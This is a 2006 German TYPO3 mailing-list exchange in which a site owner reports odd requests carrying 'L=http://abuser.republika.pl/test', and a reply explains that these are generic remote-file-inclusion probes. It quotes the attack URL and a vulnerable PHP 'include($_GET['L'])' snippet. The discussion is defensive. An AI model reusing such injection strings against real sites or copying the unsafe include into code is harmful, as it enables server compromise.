[TYPO3-german] Warnung !!! - Komische Anfrage an mein Typo3
Johannes Künsebeck
hnes_k at gmx.de
Wed Sep 6 09:43:18 CEST 2006
Martin Holtz schrieb:
Da kann doch eigentlich nichts passieren, dafür müsste Typo3 den Parameter L irgendwo als Filename
interpretieren, was ich für nicht gerade wahrscheinlich halte.
Das ist nur irgendein script, das versucht ungeschützte includes zu nutzen, z.B.
<?php
include($_GET['L']);
?>
und nicht speziell nach Typo3 Sicherheitslücken sucht.
> Hi,
>
>> Gerade habe ich bemerkt das beim aufrufen meiner Domain und nach
>> anklicken einiger Links - automatisch an die L Variable
>> "index.php?id=34&L=http://abuser.republika.pl/test" angehängt wird.
> Warum hat das denn überhaupt eine Auswirkung?
>
>> > index.php?id=34&L=http://abuser.republika.pl/test
>> >
>> > Versucht da jemand meine Seite zu knacken? Wenn ich dem Link nachgehe
>> kommt dieses php Script zum Vorschein:
> wie kommt das denn da hin?
> Woher? Ist das eine Lücke in TYPO3?
>
> Und wenn ja, dann bitte erst ans Security-Team melden.
>
>> > <?
>> >
>> > echo 'm4k4bra - mamy cie';
> Ein Php-Skript das weitere Skripte nachladen möchte...?
>
> beunruhigend. Gut wäre es, wenn du den Ort des Einbruchs nachverfolgen
> könntest. Sollte doch über die Logfiles gehen (IP suchen?).
>
> Die Wahrscheinlichkeit ist doch gegeben, dass du nicht als einziger dieses
> Problem hast....
>
> gruß,
> martin
More information about the TYPO3-german
mailing list